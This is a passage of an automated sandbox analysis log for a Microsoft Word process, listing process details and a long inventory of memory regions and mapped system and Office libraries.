# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 13.08.2022 18:41:32.620 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\office16\\winword.exe" page_root = "0x7a60b000" os_pid = "0x12c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 255 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 256 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 257 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 258 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 259 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 260 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 261 start_va = 0xb0000 end_va = 0xb3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 262 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 263 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 264 start_va = 0xe0000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 265 start_va = 0xf0000 end_va = 0xfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 266 start_va = 0x100000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 267 start_va = 0x140000 end_va = 0x141fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 268 start_va = 0x150000 end_va = 0x151fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 269 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 270 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 271 start_va = 0x180000 end_va = 0x357fff monitored = 0 entry_point = 0x181000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe") Region: id = 272 start_va = 0x360000 end_va = 0x361fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 273 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 274 start_va = 0x380000 end_va = 0x381fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 275 start_va = 0x390000 end_va = 0x391fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 276 start_va = 0x3a0000 end_va = 0x3a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 277 start_va = 0x3b0000 end_va = 0x3b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 278 start_va = 0x3c0000 end_va = 0x3c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 279 start_va = 0x3d0000 end_va = 0x3d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 280 start_va = 0x3e0000 end_va = 0x3e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 281 start_va = 0x3f0000 end_va = 0x3f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 282 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 283 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 284 start_va = 0x700000 end_va = 0x7bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 285 start_va = 0x7c0000 end_va = 0x7cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 286 start_va = 0x7d0000 end_va = 0x7defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 287 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 288 start_va = 0x8e0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 289 start_va = 0x9e0000 end_va = 0xb67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 290 start_va = 0xb70000 end_va = 0xcf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 291 start_va = 0xd00000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 292 start_va = 0x2100000 end_va = 0x21a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\1033\\wwintl.dll") Region: id = 293 start_va = 0x21b0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 294 start_va = 0x21d0000 end_va = 0x2388fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 295 start_va = 0x2390000 end_va = 0x2390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002390000" filename = "" Region: id = 296 start_va = 0x23a0000 end_va = 0x23a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 297 start_va = 0x23b0000 end_va = 0x23effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 298 start_va = 0x2440000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 299 start_va = 0x2450000 end_va = 0x2757fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 300 start_va = 0x2760000 end_va = 0x3080fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 301 start_va = 0x3090000 end_va = 0x7ecefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 302 start_va = 0x7ed0000 end_va = 0x8044fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 303 start_va = 0x80f0000 end_va = 0x80f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000080f0000" filename = "" Region: id = 304 start_va = 0x8100000 end_va = 0x8100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 305 start_va = 0x8110000 end_va = 0x820ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008110000" filename = "" Region: id = 306 start_va = 0x8280000 end_va = 0x85b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 307 start_va = 0x85c0000 end_va = 0x85fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085c0000" filename = "" Region: id = 308 start_va = 0x8600000 end_va = 0x86fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008600000" filename = "" Region: id = 309 start_va = 0x8700000 end_va = 0x872dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008700000" filename = "" Region: id = 310 start_va = 0x8730000 end_va = 0x8730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 311 start_va = 0x8740000 end_va = 0x877ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 312 start_va = 0x8780000 end_va = 0x887ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008780000" filename = "" Region: id = 313 start_va = 0x8880000 end_va = 0x897ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008880000" filename = "" Region: id = 314 start_va = 0x8980000 end_va = 0x8980fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008980000" filename = "" Region: id = 315 start_va = 0x8990000 end_va = 0x8990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008990000" filename = "" Region: id = 316 start_va = 0x89a0000 end_va = 0x89dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089a0000" filename = "" Region: id = 317 start_va = 0x89e0000 end_va = 0x8adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089e0000" filename = "" Region: id = 318 start_va = 0x8ae0000 end_va = 0x8b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ae0000" filename = "" Region: id = 319 start_va = 0x8b20000 end_va = 0x8c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b20000" filename = "" Region: id = 320 start_va = 0x8c20000 end_va = 0x8c68fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 321 start_va = 0x8c70000 end_va = 0x8d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c70000" filename = "" Region: id = 322 start_va = 0x8d70000 end_va = 0x956ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 323 start_va = 0x9570000 end_va = 0x996ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009570000" filename = "" Region: id = 324 start_va = 0x9970000 end_va = 0x9a2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009970000" filename = "" Region: id = 325 start_va = 0x9a30000 end_va = 0x9a33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a30000" filename = "" Region: id = 326 start_va = 0x9a40000 end_va = 0x9f31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a40000" filename = "" Region: id = 327 start_va = 0x9f40000 end_va = 0x9f40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f40000" filename = "" Region: id = 328 start_va = 0x9f50000 end_va = 0x9f50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f50000" filename = "" Region: id = 329 start_va = 0x9f60000 end_va = 0x9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f60000" filename = "" Region: id = 330 start_va = 0x9fa0000 end_va = 0xa09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 331 start_va = 0xa0a0000 end_va = 0xa0a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a0a0000" filename = "" Region: id = 332 start_va = 0xa0b0000 end_va = 0xa0effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0b0000" filename = "" Region: id = 333 start_va = 0xa0f0000 end_va = 0xa1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0f0000" filename = "" Region: id = 334 start_va = 0xa1f0000 end_va = 0xa1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1f0000" filename = "" Region: id = 335 start_va = 0xa200000 end_va = 0xa20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a200000" filename = "" Region: id = 336 start_va = 0xa210000 end_va = 0xa24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a210000" filename = "" Region: id = 337 start_va = 0xa250000 end_va = 0xa34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a250000" filename = "" Region: id = 338 start_va = 0xa350000 end_va = 0xa353fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a350000" filename = "" Region: id = 339 start_va = 0xa360000 end_va = 0xa39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a360000" filename = "" Region: id = 340 start_va = 0xa3a0000 end_va = 0xa49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3a0000" filename = "" Region: id = 341 start_va = 0xa4a0000 end_va = 0xa4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4a0000" filename = "" Region: id = 342 start_va = 0xa4b0000 end_va = 0xacaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a4b0000" filename = "" Region: id = 343 start_va = 0xacb0000 end_va = 0xaceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000acb0000" filename = "" Region: id = 344 start_va = 0xacf0000 end_va = 0xadeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000acf0000" filename = "" Region: id = 345 start_va = 0xadf0000 end_va = 0xae2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000adf0000" filename = "" Region: id = 346 start_va = 0xae30000 end_va = 0xaf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae30000" filename = "" Region: id = 347 start_va = 0xaf30000 end_va = 0xaf30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000af30000" filename = "" Region: id = 348 start_va = 0xaf40000 end_va = 0xaf40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000af40000" filename = "" Region: id = 349 start_va = 0xaf50000 end_va = 0xaf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af50000" filename = "" Region: id = 350 start_va = 0xaf90000 end_va = 0xb08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af90000" filename = "" Region: id = 351 start_va = 0xb090000 end_va = 0xb0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b090000" filename = "" Region: id = 352 start_va = 0xb0d0000 end_va = 0xb1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0d0000" filename = "" Region: id = 353 start_va = 0xb1d0000 end_va = 0xb1d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 354 start_va = 0xb1e0000 end_va = 0xb1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1e0000" filename = "" Region: id = 355 start_va = 0xb1f0000 end_va = 0xb3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 356 start_va = 0xb3f0000 end_va = 0xb46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3f0000" filename = "" Region: id = 357 start_va = 0xb470000 end_va = 0xb470fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 358 start_va = 0xb480000 end_va = 0xb493fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 359 start_va = 0xb4a0000 end_va = 0xb4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b4a0000" filename = "" Region: id = 360 start_va = 0xb4b0000 end_va = 0xb58ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 361 start_va = 0xb590000 end_va = 0xb593fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b590000" filename = "" Region: id = 362 start_va = 0xb5a0000 end_va = 0xb5a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b5a0000" filename = "" Region: id = 363 start_va = 0xb5b0000 end_va = 0xb5b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b5b0000" filename = "" Region: id = 364 start_va = 0xb5c0000 end_va = 0xb5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5c0000" filename = "" Region: id = 365 start_va = 0xb5d0000 end_va = 0xc5cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 366 start_va = 0xc5d0000 end_va = 0xc6aefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 367 start_va = 0xc6b0000 end_va = 0xcaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c6b0000" filename = "" Region: id = 368 start_va = 0xcab0000 end_va = 0xcaf1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\d2d1.dll.mui") Region: id = 369 start_va = 0xcc40000 end_va = 0xcd15fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc40000" filename = "" Region: id = 370 start_va = 0xcd20000 end_va = 0xcdf5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd20000" filename = "" Region: id = 371 start_va = 0xce00000 end_va = 0xce1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce00000" filename = "" Region: id = 372 start_va = 0xce20000 end_va = 0xce3efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce20000" filename = "" Region: id = 373 start_va = 0xd120000 end_va = 0xd12ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d120000" filename = "" Region: id = 374 start_va = 0xd130000 end_va = 0xd13ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d130000" filename = "" Region: id = 375 start_va = 0xd140000 end_va = 0xd14ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d140000" filename = "" Region: id = 376 start_va = 0xd150000 end_va = 0xd55bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d150000" filename = "" Region: id = 377 start_va = 0xd560000 end_va = 0xd96efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d560000" filename = "" Region: id = 378 start_va = 0xd970000 end_va = 0xdd77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d970000" filename = "" Region: id = 379 start_va = 0xdd90000 end_va = 0xde0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd90000" filename = "" Region: id = 380 start_va = 0xde10000 end_va = 0xde10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000de10000" filename = "" Region: id = 381 start_va = 0xde20000 end_va = 0xde30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 382 start_va = 0xde40000 end_va = 0xee7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 383 start_va = 0xee80000 end_va = 0xf35dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ee80000" filename = "" Region: id = 384 start_va = 0x34400000 end_va = 0x3440ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034400000" filename = "" Region: id = 385 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 386 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 387 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 388 start_va = 0x69660000 end_va = 0x69682fff monitored = 0 entry_point = 0x696769b0 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\SysWOW64\\globinputhost.dll" (normalized: "c:\\windows\\syswow64\\globinputhost.dll") Region: id = 389 start_va = 0x69690000 end_va = 0x696e1fff monitored = 0 entry_point = 0x696b8290 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 390 start_va = 0x696f0000 end_va = 0x69821fff monitored = 0 entry_point = 0x6975bf60 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\SysWOW64\\Windows.Globalization.dll" (normalized: "c:\\windows\\syswow64\\windows.globalization.dll") Region: id = 391 start_va = 0x69830000 end_va = 0x69845fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 392 start_va = 0x69850000 end_va = 0x69870fff monitored = 0 entry_point = 0x6985bdb0 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 393 start_va = 0x69880000 end_va = 0x6a074fff monitored = 0 entry_point = 0x698e5279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\chart.dll") Region: id = 394 start_va = 0x6a080000 end_va = 0x6a112fff monitored = 0 entry_point = 0x6a0a0ec0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\SysWOW64\\twinapi.dll" (normalized: "c:\\windows\\syswow64\\twinapi.dll") Region: id = 395 start_va = 0x6a120000 end_va = 0x6a30efff monitored = 0 entry_point = 0x6a165e20 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 396 start_va = 0x6a310000 end_va = 0x6a376fff monitored = 0 entry_point = 0x6a325a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 397 start_va = 0x6a380000 end_va = 0x6a388fff monitored = 0 entry_point = 0x6a383830 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 398 start_va = 0x6a390000 end_va = 0x6a3c3fff monitored = 0 entry_point = 0x6a3a8280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 399 start_va = 0x6a3d0000 end_va = 0x6a571fff monitored = 0 entry_point = 0x6a3d1000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 400 start_va = 0x6a580000 end_va = 0x6a587fff monitored = 0 entry_point = 0x6a5817b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 401 start_va = 0x6a590000 end_va = 0x6a60cfff monitored = 0 entry_point = 0x6a5a0db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 402 start_va = 0x6a610000 end_va = 0x6a668fff monitored = 0 entry_point = 0x6a620780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 403 start_va = 0x6a670000 end_va = 0x6a7e2fff monitored = 0 entry_point = 0x6a71d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 404 start_va = 0x6a7f0000 end_va = 0x6a84bfff monitored = 0 entry_point = 0x6a7f8880 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: 